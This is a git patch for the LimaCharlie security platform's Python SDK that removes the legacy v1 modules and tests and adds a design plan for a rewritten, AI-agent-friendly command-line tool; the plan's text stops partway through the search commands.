From c0b782239a30bc64261896c62f8269aa694a379a Mon Sep 17 00:00:00 2001
From: dzimine-lc <dmitri@limacharlie.io>
Date: Fri, 20 Feb 2026 12:15:41 -0600
Subject: [PATCH] Remove legacy v1 SDK code, tests, and documentation
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The v2 SDK and CLI are fully independent of the legacy v1 code.
This removes all legacy modules to make a clean break for the 5.0
release.

- Delete 26 legacy PascalCase domain modules (Manager.py, Sensor.py, etc.)
- Delete 6 legacy-only utility files (utils.py, request_utils.py, etc.)
- Rewrite __init__.py to only re-export __version__ from client.py
- Delete 9 legacy unit tests and 8 legacy integration tests
- Update test_user_agent.py to use build_user_agent() directly
- Rename integration test_v2_*.py → test_*.py
- Remove legacy v1 SDK section and migration table from README
- Update CLAUDE.md to reflect single-SDK architecture

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 NEW_CLI.md                                    | 1291 +++++++++
 README.md                                     |   86 +-
 limacharlie/ARL.py                            |   32 -
 limacharlie/Billing.py                        |   35 -
 limacharlie/Configs.py                        | 1136 --------
 limacharlie/DRCli.py                          |  100 -
 limacharlie/Extensions.py                     |  394 ---
 limacharlie/Firehose.py                       |  334 ---
 limacharlie/Hive.py                           |  419 ---
 limacharlie/Jobs.py                           |   78 -
 limacharlie/Logs.py                           |  398 ---
 limacharlie/Manager.py                        | 2507 -----------------
 limacharlie/Model.py                          |  303 --
 limacharlie/Payloads.py                       |   91 -
 limacharlie/Query.py                          |  506 ----
 limacharlie/Replay.py                         |  480 ----
 limacharlie/Replicants.py                     |  407 ---
 limacharlie/Search.py                         |  233 --
 limacharlie/SearchAPI.py                      |  573 ----
 limacharlie/Sensor.py                         |  539 ----
 limacharlie/SpotCheck.py                      |  538 ----
 limacharlie/Spout.py                          |  267 --
 limacharlie/Sync.py                           |  641 -----
 limacharlie/USP.py                            |  352 ---
 limacharlie/User.py                           |  118 -
 limacharlie/UserPreferences.py                |   35 -
 limacharlie/Webhook.py                        |   28 -
 limacharlie/WebhookSender.py                  |   62 -
 limacharlie/__init__.py                       |   85 +-
 limacharlie/oauth.py                          |   81 -
 limacharlie/request_utils.py                  |   47 -
 limacharlie/term_utils.py                     |  247 --
 limacharlie/time_utils.py                     |  184 --
 limacharlie/utils.py                          |  362 ---
 limacharlie/versions.py                       |   94 -
 .../integration/{test_v2_ai.py => test_ai.py} |    0
 tests/integration/test_artifacts.py           |  131 +-
 .../{test_v2_auth.py => test_auth.py}         |    0
 .../{test_v2_billing.py => test_billing.py}   |    0
 ...rehensive.py => test_cli_comprehensive.py} |    0
 .../{test_v2_cli_e2e.py => test_cli_e2e.py}   |    0
 tests/integration/test_core.py                |  268 --
 .../{test_v2_exfil.py => test_exfil.py}       |    0
 ...st_v2_extensions.py => test_extensions.py} |    0
 .../{test_v2_groups.py => test_groups.py}     |    0
 .../{test_v2_hive.py => test_hive.py}         |    0
 tests/integration/test_hive_validation.py     |  222 --
 tests/integration/test_insight.py             |   59 -
 ...test_v2_integrity.py => test_integrity.py} |    0
 .../{test_v2_jobs.py => test_jobs.py}         |    0
 .../{test_v2_keys.py => test_keys.py}         |    0
 .../{test_v2_logging.py => test_logging.py}   |    0
 .../{test_v2_org.py => test_org.py}           |    0
 ...g_management.py => test_org_management.py} |    0
 .../{test_v2_outputs.py => test_outputs.py}   |    0
 .../{test_v2_replay.py => test_replay.py}     |    0
 tests/integration/test_replicants.py          |   19 -
 .../{test_v2_rules.py => test_rules.py}       |    0
 .../{test_v2_search.py => test_search.py}     |    0
 .../test_search_api_integration.py            |  703 -----
 .../{test_v2_sensors.py => test_sensors.py}   |    0
 tests/integration/test_spout.py               |   44 -
 .../{test_v2_stream.py => test_stream.py}     |    0
 tests/integration/test_sync.py                |  228 +-
 .../{test_v2_users.py => test_users.py}       |    0
 .../{test_v2_usp.py => test_usp.py}           |    0
 tests/integration/test_v2_artifacts.py        |   85 -
 tests/integration/test_v2_sync.py             |   60 -
 .../{test_v2_yara.py => test_yara.py}         |    0
 tests/unit/test_configs.py                    |  187 --
 tests/unit/test_query.py                      |   61 -
 tests/unit/test_requests_utils.py             |  122 -
 tests/unit/test_search_api.py                 |  579 ----
 tests/unit/test_search_api_extended.py        | 2318 ---------------
 tests/unit/test_ssl_context.py                |   59 -
 tests/unit/test_term_utils.py                 |  105 -
 tests/unit/test_time_utils.py                 |  926 ------
 tests/unit/test_user_agent.py                 |  279 +-
 tests/unit/test_usp.py                        |  390 ---
 79 files changed, 1492 insertions(+), 18436 deletions(-)
 create mode 100644 NEW_CLI.md
 delete mode 100644 limacharlie/ARL.py
 delete mode 100644 limacharlie/Billing.py
 delete mode 100644 limacharlie/Configs.py
 delete mode 100644 limacharlie/DRCli.py
 delete mode 100644 limacharlie/Extensions.py
 delete mode 100644 limacharlie/Firehose.py
 delete mode 100644 limacharlie/Hive.py
 delete mode 100644 limacharlie/Jobs.py
 delete mode 100644 limacharlie/Logs.py
 delete mode 100644 limacharlie/Manager.py
 delete mode 100644 limacharlie/Model.py
 delete mode 100644 limacharlie/Payloads.py
 delete mode 100644 limacharlie/Query.py
 delete mode 100644 limacharlie/Replay.py
 delete mode 100644 limacharlie/Replicants.py
 delete mode 100644 limacharlie/Search.py
 delete mode 100644 limacharlie/SearchAPI.py
 delete mode 100644 limacharlie/Sensor.py
 delete mode 100644 limacharlie/SpotCheck.py
 delete mode 100644 limacharlie/Spout.py
 delete mode 100644 limacharlie/Sync.py
 delete mode 100644 limacharlie/USP.py
 delete mode 100644 limacharlie/User.py
 delete mode 100644 limacharlie/UserPreferences.py
 delete mode 100644 limacharlie/Webhook.py
 delete mode 100644 limacharlie/WebhookSender.py
 delete mode 100644 limacharlie/oauth.py
 delete mode 100644 limacharlie/request_utils.py
 delete mode 100644 limacharlie/term_utils.py
 delete mode 100644 limacharlie/time_utils.py
 delete mode 100644 limacharlie/utils.py
 delete mode 100644 limacharlie/versions.py
 rename tests/integration/{test_v2_ai.py => test_ai.py} (100%)
 rename tests/integration/{test_v2_auth.py => test_auth.py} (100%)
 rename tests/integration/{test_v2_billing.py => test_billing.py} (100%)
 rename tests/integration/{test_v2_cli_comprehensive.py => test_cli_comprehensive.py} (100%)
 rename tests/integration/{test_v2_cli_e2e.py => test_cli_e2e.py} (100%)
 delete mode 100644 tests/integration/test_core.py
 rename tests/integration/{test_v2_exfil.py => test_exfil.py} (100%)
 rename tests/integration/{test_v2_extensions.py => test_extensions.py} (100%)
 rename tests/integration/{test_v2_groups.py => test_groups.py} (100%)
 rename tests/integration/{test_v2_hive.py => test_hive.py} (100%)
 delete mode 100644 tests/integration/test_hive_validation.py
 delete mode 100644 tests/integration/test_insight.py
 rename tests/integration/{test_v2_integrity.py => test_integrity.py} (100%)
 rename tests/integration/{test_v2_jobs.py => test_jobs.py} (100%)
 rename tests/integration/{test_v2_keys.py => test_keys.py} (100%)
 rename tests/integration/{test_v2_logging.py => test_logging.py} (100%)
 rename tests/integration/{test_v2_org.py => test_org.py} (100%)
 rename tests/integration/{test_v2_org_management.py => test_org_management.py} (100%)
 rename tests/integration/{test_v2_outputs.py => test_outputs.py} (100%)
 rename tests/integration/{test_v2_replay.py => test_replay.py} (100%)
 delete mode 100644 tests/integration/test_replicants.py
 rename tests/integration/{test_v2_rules.py => test_rules.py} (100%)
 rename tests/integration/{test_v2_search.py => test_search.py} (100%)
 delete mode 100644 tests/integration/test_search_api_integration.py
 rename tests/integration/{test_v2_sensors.py => test_sensors.py} (100%)
 delete mode 100644 tests/integration/test_spout.py
 rename tests/integration/{test_v2_stream.py => test_stream.py} (100%)
 rename tests/integration/{test_v2_users.py => test_users.py} (100%)
 rename tests/integration/{test_v2_usp.py => test_usp.py} (100%)
 delete mode 100644 tests/integration/test_v2_artifacts.py
 delete mode 100644 tests/integration/test_v2_sync.py
 rename tests/integration/{test_v2_yara.py => test_yara.py} (100%)
 delete mode 100644 tests/unit/test_configs.py
 delete mode 100644 tests/unit/test_query.py
 delete mode 100644 tests/unit/test_requests_utils.py
 delete mode 100644 tests/unit/test_search_api.py
 delete mode 100644 tests/unit/test_search_api_extended.py
 delete mode 100644 tests/unit/test_ssl_context.py
 delete mode 100644 tests/unit/test_term_utils.py
 delete mode 100644 tests/unit/test_time_utils.py
 delete mode 100644 tests/unit/test_usp.py

diff --git a/NEW_CLI.md b/NEW_CLI.md
new file mode 100644
index 00000000..e2bd8620
--- /dev/null
+++ b/NEW_CLI.md
@@ -0,0 +1,1291 @@
+# LimaCharlie Python SDK & CLI v2.0.0 - Design & Implementation Plan
+
+## Executive Summary
+
+This document describes the design for a complete rewrite of the LimaCharlie Python SDK and CLI (v2.0.0). The primary design goal is **AI/LLM-first discoverability**: every command, parameter, and concept should be self-documenting enough that an AI agent (like Claude Code) can operate the CLI effectively without prior LimaCharlie knowledge.
+
+The new CLI covers 100%+ of the current CLI features, plus new capabilities from the API gateway (AI generation, groups, investigations, SOPs, org notes, etc.).
+
+---
+
+## Table of Contents
+
+1. [Design Principles](#1-design-principles)
+2. [CLI Architecture](#2-cli-architecture)
+3. [Authentication & Configuration](#3-authentication--configuration)
+4. [SDK Core Classes](#4-sdk-core-classes)
+5. [Command Groups & Commands](#5-command-groups--commands)
+6. [Output & Formatting](#6-output--formatting)
+7. [AI/LLM Discoverability Features](#7-aillm-discoverability-features)
+8. [Testing Strategy](#8-testing-strategy)
+9. [Migration & Packaging](#9-migration--packaging)
+10. [Detailed Command Reference](#10-detailed-command-reference)
+11. [Implementation Checklist](#11-implementation-checklist)
+
+---
+
+## 1. Design Principles
+
+### 1.1 AI/LLM-First Discoverability
+- [ ] Every command has a `--explain` flag that prints a detailed paragraph explaining what the command does, when to use it, and common patterns
+- [ ] Every parameter has a rich `help=` string with type info, examples, and constraints
+- [ ] `limacharlie help <topic>` provides concept guides (e.g., `limacharlie help d&r-rules`, `limacharlie help hive`, `limacharlie help lcql`)
+- [ ] `limacharlie discover` lists all commands grouped by use-case profile (matching MCP server profiles: sensor_management, detection_engineering, platform_admin, etc.)
+- [ ] `limacharlie cheatsheet <topic>` prints quick-reference examples
+- [ ] Every error message includes a suggestion for what to do next
+- [ ] JSON Schema output available for every command's parameters via `limacharlie schema <command>`
+
+### 1.2 Consistent Command Structure
+- [ ] All commands follow `limacharlie <noun> <verb>` pattern (e.g., `limacharlie sensor list`, `limacharlie rule create`)
+- [ ] CRUD operations use consistent verbs: `list`, `get`, `create`, `update`, `delete`
+- [ ] Bulk operations use consistent verbs: `export`, `import`, `sync`
+- [ ] Destructive operations require `--confirm` or print a confirmation prompt
+- [ ] All identifiers use consistent flag names: `--oid`, `--sid`, `--name`, `--key`
+
+### 1.3 Machine-Readable Output
+- [ ] Default output is human-readable tables (for interactive use)
+- [ ] `--output json` for JSON (default when stdout is piped/not a TTY)
+- [ ] `--output yaml` for YAML
+- [ ] `--output csv` for CSV
+- [ ] `--output jsonl` for newline-delimited JSON (for streaming)
+- [ ] `--quiet` / `-q` suppresses all output except errors
+- [ ] Exit codes are meaningful: 0=success, 1=general error, 2=auth error, 3=not found, 4=validation error
+
+### 1.4 Composability
+- [ ] All commands accept `--oid` to specify org (overrides env/config)
+- [ ] All create/update commands support `--input-file` to read parameters from JSON/YAML file (rule create, hive set, output create, extension config set, etc.)
+- [ ] All list commands support `--filter` for client-side jmespath filtering
+- [ ] All list commands support `--limit` and `--offset` for pagination
+- [ ] Stdin support for piping data between commands
+
+---
+
+## 2. CLI Architecture
+
+### 2.1 Entry Point & Framework
+- [ ] Use `click` library for CLI framework (replacing raw argparse)
+- [ ] Single entry point: `limacharlie` command with click groups
+- [ ] Plugin architecture: each command group is a separate module auto-discovered from `limacharlie/commands/`
+- [ ] Global options: `--oid`, `--env`, `--output`, `--debug`, `--quiet`, `--profile`
+- [ ] Version command: `limacharlie version` (replaces `limacharlie version`)
+
+### 2.2 Module Structure
+
+v2 replaces the existing code directly in the `limacharlie/` package (no backwards compatibility with v1 needed). Old v1 modules are removed.
+
+```
+limacharlie/
+├── __init__.py
+├── __main__.py                  # Entry point: limacharlie CLI
+├── cli.py                       # Main CLI entry point & click groups
+├── config.py                    # Auth & configuration management
+├── client.py                    # HTTP client with retry, auth, rate limiting
+├── output.py                    # Output formatting (json/yaml/csv/table)
+├── errors.py                    # Custom exception hierarchy
+├── help_topics.py               # Inline help topic content
+├── discovery.py                 # Command discovery & explain system
+├── sdk/
+│   ├── __init__.py
+│   ├── organization.py          # Organization management
+│   ├── sensor.py                # Sensor operations
+│   ├── dr_rules.py              # Detection & Response rules
+│   ├── fp_rules.py              # False positive rules
+│   ├── hive.py                  # Hive key-value store
+│   ├── outputs.py               # Output integrations
+│   ├── artifacts.py             # Artifact/log management
+│   ├── payloads.py              # Payload management
+│   ├── search.py                # Search & LCQL queries
+│   ├── insight.py               # IOC search & event queries
+│   ├── extensions.py            # Extension management
+│   ├── installation_keys.py     # Installation key management
+│   ├── ingestion_keys.py        # Ingestion key management
+│   ├── users.py                 # User & permission management
+│   ├── groups.py                # Organization group management
+│   ├── api_keys.py              # API key management
+│   ├── billing.py               # Billing & usage
+│   ├── spout.py                 # Real-time streaming (WebSocket)
+│   ├── firehose.py              # Real-time streaming (TCP/TLS)
+│   ├── replay.py                # D&R rule replay/testing
+│   ├── integrity.py             # Integrity monitoring rules
+│   ├── exfil.py                 # Exfil prevention rules
+│   ├── logging_rules.py         # Logging/log collection rules
+│   ├── configs.py               # Configuration sync (IaC)
+│   ├── ai.py                    # AI-powered generation
+│   ├── investigations.py        # Investigation management
+│   ├── usp.py                   # USP adapter validation
+│   ├── jobs.py                  # Service job tracking
+│   ├── yara.py                  # YARA scanning & rule management
+│   └── arl.py                   # Authenticated Resource Locator resolution
+├── commands/
+│   ├── __init__.py
+│   ├── auth.py                  # login, logout, whoami, use-org
+│   ├── sensor.py                # sensor list, get, delete, upgrade, export, dump, sweep
+│   ├── rule.py                  # rule list, get, create, delete, test, ...
+│   ├── fp.py                    # fp list, get, create, delete
+│   ├── hive.py                  # hive list, get, set, delete, validate, ...
+│   ├── output_cmd.py            # output list, create, delete
+│   ├── artifact.py              # artifact upload, list, download
+│   ├── payload.py               # payload list, upload, download, delete
+│   ├── search.py                # search run, validate, interactive, saved-queries
+│   ├── ioc.py                   # ioc search, batch-search, enrich
+│   ├── event.py                 # event list, get, timeline
+│   ├── detection.py             # detection list, get
+│   ├── extension.py             # extension list, subscribe, unsubscribe, convert-rules, ...
+│   ├── installation_key.py      # installation-key list, create, delete
+│   ├── ingestion_key.py         # ingestion-key list, create, delete, configure
+│   ├── user.py                  # user list, invite, remove, permission
+│   ├── group.py                 # group list, create, delete, member, ...
+│   ├── api_key.py               # api-key list, create, delete
+│   ├── org.py                   # org info, create, delete, rename, config, errors, ...
+│   ├── billing.py               # billing status, details, invoice, plans
+│   ├── stream.py                # stream events, detections, audit (spout)
+│   ├── replay_cmd.py            # replay run, test-rule
+│   ├── integrity.py             # integrity list, create, delete
+│   ├── exfil.py                 # exfil list, create, delete
+│   ├── logging_cmd.py           # logging list, create, delete
+│   ├── sync.py                  # sync push, pull, diff
+│   ├── ai.py                    # ai generate-rule, generate-query, ...
+│   ├── investigation.py         # investigation list, get, create, delete
+│   ├── usp.py                   # usp validate
+│   ├── schema.py                # schema list, get
+│   ├── tag.py                   # tag list, add, remove, mass-tag
+│   ├── task.py                  # task send, reliable-send, list-reliable
+│   ├── endpoint_policy.py       # endpoint-policy (isolate, rejoin, seal, unseal)
+│   ├── yara.py                  # yara scan, rules, sources
+│   ├── cloud_sensor.py          # cloud-sensor list, get, set, delete
+│   ├── job.py                   # job list, get, delete, wait
+│   ├── arl.py                   # arl get
+│   ├── spotcheck.py             # spotcheck run
+│   ├── secret.py                # secret list, get, set, delete (NEW)
+│   ├── lookup.py                # lookup list, get, set, query, delete (NEW)
+│   ├── playbook.py              # playbook list, get, set, delete (NEW)
+│   ├── adapter.py               # adapter list, get, set, delete (NEW)
+│   ├── sop.py                   # sop list, get, set, delete (NEW)
+│   ├── note.py                  # note list, get, set, delete (NEW)
+│   ├── audit.py                 # audit list
+│   └── help_cmd.py              # help, discover, cheatsheet, schema
+tests/
+├── unit/
+│   ├── __init__.py
+│   ├── conftest.py
+│   ├── test_cli_commands.py
+│   ├── test_config.py
+│   ├── test_client.py
+│   ├── test_output.py
+│   ├── test_errors.py
+│   ├── test_sdk_organization.py
+│   ├── test_sdk_sensor.py
+│   ├── test_sdk_dr_rules.py
+│   ├── test_sdk_hive.py
+│   ├── test_sdk_search.py
+│   ├── test_sdk_configs.py
+│   └── ...
+└── integration/
+    ├── __init__.py
+    ├── conftest.py              # Integration fixtures with cleanup
+    ├── test_auth.py
+    ├── test_sensor.py
+    ├── test_rules.py
+    ├── test_hive.py
+    ├── test_outputs.py
+    ├── test_artifacts.py
+    ├── test_search.py
+    ├── test_extensions.py
+    ├── test_users.py
+    ├── test_api_keys.py
+    ├── test_installation_keys.py
+    ├── test_ingestion_keys.py
+    ├── test_sync.py
+    ├── test_replay.py
+    ├── test_stream.py
+    ├── test_ai.py
+    ├── test_billing.py
+    ├── test_groups.py
+    ├── test_org_management.py
+    ├── test_usp.py
+    ├── test_integrity.py
+    ├── test_exfil.py
+    ├── test_logging.py
+    ├── test_yara.py
+    ├── test_jobs.py
+    └── test_cli_e2e.py          # End-to-end CLI tests
+```
+
+- [ ] Create this directory structure (remove all v1 modules)
+- [ ] Each command module auto-registers its click group
+
+### 2.3 Clean Break from v1
+This is a full v2.0.0 rewrite with no backwards compatibility requirement:
+- [ ] v2 code replaces v1 code directly in the `limacharlie/` package (no `v2/` subpackage)
+- [ ] All v1 modules (Manager.py, Sensor.py, etc.) are removed
+- [ ] Entry point `limacharlie` runs the new Click-based CLI
+- [ ] SDK classes available as `limacharlie.sdk.*` (e.g., `from limacharlie.sdk.organization import Organization`)
+- [ ] No fallback to v1 CLI, no `limacharlie-v1` entry point
+
+---
+
+## 3. Authentication & Configuration
+
+### 3.1 Credential Storage
+- [ ] Same file location: `~/.limacharlie` (YAML format)
+- [ ] Support named environments/profiles: `limacharlie auth use-env production`
+- [ ] Environment variables: `LC_OID`, `LC_API_KEY`, `LC_UID`, `LC_CURRENT_ENV`, `LC_CREDS_FILE`, `LC_EPHEMERAL_CREDS`
+- [ ] Ephemeral mode (no disk writes) via `LC_EPHEMERAL_CREDS=1`
+- [ ] File permissions enforced at 600
+
+### 3.2 Auth Commands
+- [ ] `limacharlie auth login` - Interactive login (OAuth or API key)
+- [ ] `limacharlie auth login --api-key <key> --oid <oid>` - Non-interactive API key login
+- [ ] `limacharlie auth login --uid <uid> --api-key <key>` - User-scoped API key login
+- [ ] `limacharlie auth logout` - Clear stored credentials
+- [ ] `limacharlie auth whoami` - Show current identity, permissions, accessible orgs
+- [ ] `limacharlie auth test [--permissions perm1,perm2]` - Test current auth and optional specific permissions
+- [ ] `limacharlie auth use-env <name>` - Switch named environment
+- [ ] `limacharlie auth list-envs` - List configured environments
+- [ ] `limacharlie auth use-org <oid-or-name>` - Set default organization (resolves names to OIDs)
+- [ ] `limacharlie auth list-orgs [--filter <text>]` - List accessible organizations
+
+### 3.3 Client Features
+- [ ] Automatic JWT generation and refresh
+- [ ] Retry logic: 3 retries with exponential backoff for 429/504
+- [ ] Rate limit awareness: log warnings on rate limit headers
+- [ ] Request debugging via `--debug` (prints curl-equivalent commands)
+- [ ] User-Agent header: `limacharlie-cli/2.0.0 python/3.x`
+- [ ] Idempotent key support for safe retries on write operations
+
+---
+
+## 4. SDK Core Classes
+
+### 4.1 Client
+- [ ] `limacharlie.Client(oid, api_key, uid, environment, jwt, ...)`
+- [ ] Automatic credential resolution: explicit params > env vars > config file
+- [ ] Thread-safe JWT management with automatic refresh
+- [ ] Request/response logging for debugging
+- [ ] Rate limit tracking and backoff
+- [ ] Context manager support (`with Client(...) as client:`)
+
+### 4.2 Organization
+- [ ] `Organization(client)` - Main entry point for all org-scoped operations
+- [ ] Properties: `oid`, `name`, `info`, `urls`
+- [ ] Methods for all org-level operations (sensors, rules, hives, etc.)
+- [ ] Lazy-loaded cached properties for org info and URLs
+
+### 4.3 Sensor
+- [ ] `Sensor(organization, sid)` - Represents a single sensor
+- [ ] Properties: `sid`, `hostname`, `platform`, `architecture`, `external_ip`, `internal_ip`, `is_online`, `is_isolated`, `tags`, `version`, `enrollment_time`, `last_seen`
+- [ ] Platform helpers: `is_windows`, `is_linux`, `is_macos`, `is_chrome`
+- [ ] Task methods: `task()`, `request()`, `simple_request()`
+- [ ] Tag methods: `add_tag()`, `remove_tag()`, `get_tags()`
+- [ ] Network methods: `isolate()`, `rejoin()`, `is_isolated`
+- [ ] Lifecycle methods: `delete()`, `seal()`, `unseal()`
+- [ ] Event methods: `get_events()`, `get_timeline()`, `get_overview()`
+
+### 4.4 Hive
+- [ ] `Hive(organization, hive_name, partition_key=None)` - Key-value store
+- [ ] `HiveRecord` - Record with data, metadata, etag support
+- [ ] Methods: `list()`, `get()`, `set()`, `delete()`, `validate()`, `rename()`
+- [ ] Transaction support: `update_tx(callback)` with automatic etag retry
+- [ ] Batch operations: `batch().get().set().delete().execute()`
+
+### 4.5 Search
+- [ ] `Search(organization)` - LCQL query execution
+- [ ] Methods: `validate()`, `estimate()`, `execute()`, `execute_streaming()`
+- [ ] Iterator-based pagination for large result sets
+- [ ] Progress callback support
+- [ ] Saved query management: `list_saved()`, `get_saved()`, `create_saved()`, `delete_saved()`
+
+### 4.6 Spout (Real-time Streaming)
+- [ ] `Spout(organization, data_type, filters=...)` - WebSocket streaming
+- [ ] Configurable filters: investigation_id, tags, categories, sensor_ids
+- [ ] Auto-reconnect with exponential backoff
+- [ ] Queue-based buffering with configurable max
+- [ ] Context manager: `with Spout(...) as spout: for event in spout: ...`
+- [ ] Future results tracking for sensor tasking
+
+### 4.7 Configs (Infrastructure-as-Code)
+- [ ] `Configs(organization)` - Configuration sync
+- [ ] `fetch(components)` - Download current config
+- [ ] `push(config, components, force=False, dry_run=False)` - Upload config
+- [ ] `diff(config, components)` - Show differences
+- [ ] Component selection: rules, fps, outputs, integrity, exfil, logging, artifacts, extensions, org_configs, hives, installation_keys, yara
+
+### 4.8 AI Generation (NEW)
+- [ ] `AI(organization)` - AI-powered generation
+- [ ] `generate_dr_rule(description)` - Generate D&R rule from natural language
+- [ ] `generate_detection(description)` - Generate detection component
+- [ ] `generate_response(description)` - Generate response component
+- [ ] `generate_lcql(description)` - Generate LCQL query from natural language
+- [ ] `generate_sensor_selector(description)` - Generate bexpr selector
+- [ ] `generate_playbook(description)` - Generate Python playbook
+- [ ] `summarize_detection(detection_data)` - Summarize a detection
+
+---
+
+## 5. Command Groups & Commands
+
+### Organization Commands - `limacharlie org`
+- [ ] `org info` - Get organization details (sensor count, version, quotas, name)
+- [ ] `org list` - List accessible organizations (with --filter support)
+- [ ] `org create <name> --location <loc> [--template <t>]` - Create new org
+- [ ] `org delete --confirm <token>` - Delete organization (two-step)
+- [ ] `org rename <new-name>` - Rename organization
+- [ ] `org config get [<key>]` - Get org configuration value(s)
+- [ ] `org config set <key> <value>` - Set org configuration value
+- [ ] `org urls` - Get service URLs for organization
+- [ ] `org quota set <n>` - Set sensor quota
+- [ ] `org stats` - Get usage statistics
+- [ ] `org errors [--dismiss <component>]` - List/dismiss org errors
+- [ ] `org mitre-report` - Get MITRE ATT&CK coverage report
+- [ ] `org schema [--event-type <type>] [--platform <plat>]` - Get event schemas/ontology
+- [ ] `org runtime-metadata [--entity-type <t>] [--entity-name <n>]` - Get runtime metadata
+- [ ] `org check-name <name>` - Check if organization name is available
+
+### Sensor Commands - `limacharlie sensor`
+- [ ] `sensor list [--selector <bexpr>] [--limit <n>] [--online-only] [--with-ip <ip>] [--with-hostname <prefix>]` - List sensors with rich filtering
+- [ ] `sensor get <sid>` - Get sensor details
+- [ ] `sensor delete <sid> --confirm` - Delete sensor
+- [ ] `sensor online <sid>` - Check if sensor is online
+- [ ] `sensor wait-online <sid> --timeout <secs>` - Wait for sensor to come online
+- [ ] `sensor upgrade [--selector <bexpr>]` - Upgrade sensors to latest version across fleet
+- [ ] `sensor set-version --version <version>` - Set sensor version/branch for organization
+- [ ] `sensor export [--selector <bexpr>]` - Export full sensor manifest as JSON/CSV
+- [ ] `sensor dump <sid> --confirm` - Trigger full memory dump on sensor (DESTRUCTIVE/HEAVY)
+- [ ] `sensor sweep <sid> --config <json-or-file>` - Run host sweep/scan on sensor
+
+### Tag Commands - `limacharlie tag`
+- [ ] `tag list [--sensor <sid>]` - List all tags or tags for a sensor
+- [ ] `tag add <sid> <tag> [--ttl <duration>]` - Add tag to sensor
+- [ ] `tag remove <sid> <tag>` - Remove tag from sensor
+- [ ] `tag find <tag>` - Find all sensors with a tag
+- [ ] `tag mass-add --selector <bexpr> --tag <tag> [--ttl <duration>]` - Bulk tag sensors
+- [ ] `tag mass-remove --selector <bexpr> --tag <tag>` - Bulk untag sensors
+
+### Endpoint Policy Commands - `limacharlie endpoint-policy`
+- [ ] `endpoint-policy isolate <sid> --confirm` - Isolate sensor from network (DESTRUCTIVE)
+- [ ] `endpoint-policy rejoin <sid> --confirm` - Rejoin sensor to network (DESTRUCTIVE)
+- [ ] `endpoint-policy status <sid>` - Check isolation status
+- [ ] `endpoint-policy seal <sid>` - Seal sensor
+- [ ] `endpoint-policy unseal <sid>` - Unseal sensor
+
+### Sensor Tasking Commands - `limacharlie task`
+- [ ] `task send <sid> <task-command> [--investigation-id <id>]` - Send task to sensor (fire-and-forget)
+- [ ] `task request <sid> <task-command> [--timeout <secs>]` - Send task and wait for response
+- [ ] `task reliable-send <sid> <task-command>` - Guaranteed delivery task
+- [ ] `task reliable-list <sid>` - List pending reliable tasks
+- [ ] `task reliable-delete <sid> <task-id>` - Cancel reliable task
+
+### D&R Rule Commands - `limacharlie rule`
+- [ ] `rule list [--namespace <ns>]` - List D&R rules (namespace: general, managed, service)
+- [ ] `rule get <name> [--namespace <ns>]` - Get rule details
+- [ ] `rule create <name> --detect <json-or-file> --respond <json-or-file> [--namespace <ns>] [--enabled] [--ttl <secs>] [--replace]` - Create/replace rule
+- [ ] `rule create --input-file <yaml-or-json>` - Create rule from file
+- [ ] `rule update <name> --detect <json-or-file> --respond <json-or-file> [--namespace <ns>]` - Update existing rule
+- [ ] `rule delete <name> [--namespace <ns>]` - Delete rule
+- [ ] `rule test <name> --events <json-or-file> [--trace]` - Test rule against sample events
+- [ ] `rule replay <name> --start <time> --end <time> [--sid <sid>] [--selector <bexpr>] [--trace] [--dry-run]` - Replay rule against historical data
+- [ ] `rule validate --detect <json-or-file> --respond <json-or-file>` - Validate rule components without deploying
+- [ ] `rule export [--namespace <ns>]` - Export all rules as YAML
+- [ ] `rule import --input-file <yaml> [--namespace <ns>] [--dry-run]` - Import rules from YAML
+
+### False Positive Commands - `limacharlie fp`
+- [ ] `fp list` - List false positive rules
+- [ ] `fp get <name>` - Get FP rule details
+- [ ] `fp create <name> --rule <json-or-file> [--replace]` - Create FP rule
+- [ ] `fp delete <name>` - Delete FP rule
+
+### Hive Commands - `limacharlie hive`
+- [ ] `hive list-types` - List available hive types (dr-general, dr-managed, fp, cloud_sensor, yara, secret, lookup, query, playbook, ai_agent, external_adapter, ...)
+- [ ] `hive list <hive-name> [--partition-key <pk>]` - List records in a hive
+- [ ] `hive get <hive-name> <key> [--partition-key <pk>]` - Get record
+- [ ] `hive set <hive-name> <key> --data <json-or-file> [--enabled] [--tags <t1,t2>] [--comment <text>] [--expiry <ts>] [--etag <etag>] [--partition-key <pk>]` - Create/update record
+- [ ] `hive delete <hive-name> <key> [--partition-key <pk>]` - Delete record
+- [ ] `hive validate <hive-name> <key> --data <json-or-file> [--partition-key <pk>]` - Validate record
+- [ ] `hive rename <hive-name> <key> <new-key> [--partition-key <pk>]` - Rename record
+- [ ] `hive export <hive-name> [--partition-key <pk>]` - Export all records as YAML
+- [ ] `hive import <hive-name> --input-file <yaml> [--partition-key <pk>] [--dry-run]` - Import records
+
+### Output Commands - `limacharlie output`
+- [ ] `output list` - List configured outputs
+- [ ] `output get <name>` - Get output details
+- [ ] `output create <name> --module <type> --type <data-type> [--params <json>]` - Create output
+- [ ] `output create --input-file <yaml-or-json>` - Create from file
+- [ ] `output delete <name>` - Delete output
+
+### Artifact Commands - `limacharlie artifact`
+- [ ] `artifact upload <file-path> [--source <src>] [--hint <hint>] [--retention-days <n>] [--original-path <path>]` - Upload artifact/log
+- [ ] `artifact list [--sensor <sid>]` - List artifacts
+- [ ] `artifact get <artifact-id>` - Get artifact details
+- [ ] `artifact download <artifact-id> [--output-path <path>]` - Download artifact
+- [ ] `artifact rules list` - List artifact collection rules
+- [ ] `artifact rules create <name> --patterns <p1,p2> [--tags <t1,t2>] [--platforms <plats>]` - Create rule
+- [ ] `artifact rules delete <name>` - Delete rule
+
+### Payload Commands - `limacharlie payload`
+- [ ] `payload list` - List payloads
+- [ ] `payload upload <name> --file <path>` - Upload payload
+- [ ] `payload download <name> [--output-path <path>]` - Download payload
+- [ ] `payload delete <name>` - Delete payload
+
+### Search Commands - `limacharlie search`
+- [ ] `search run <lcql-query> --start <time> --end <time> [--stream <event|detect|audit>] [--limit <n>]` - Execute LCQL query
+- [ ] `search run --input-file <query-file> --start <time> --end <time>` - Execute from file
+- [ ] `search validate <lcql-query>` - Validate LCQL syntax
+- [ ] `search estimate <lcql-query> --start <time> --end <time>` - Estimate billing cost
+- [ ] `search saved list` - List saved queries
+- [ ] `search saved get <name>` - Get saved query
+- [ ] `search saved create <name> --query <lcql> --start <time> --end <time>` - Create saved query
+- [ ] `search saved run <name>` - Execute saved query
+- [ ] `search saved delete <name>` - Delete saved query
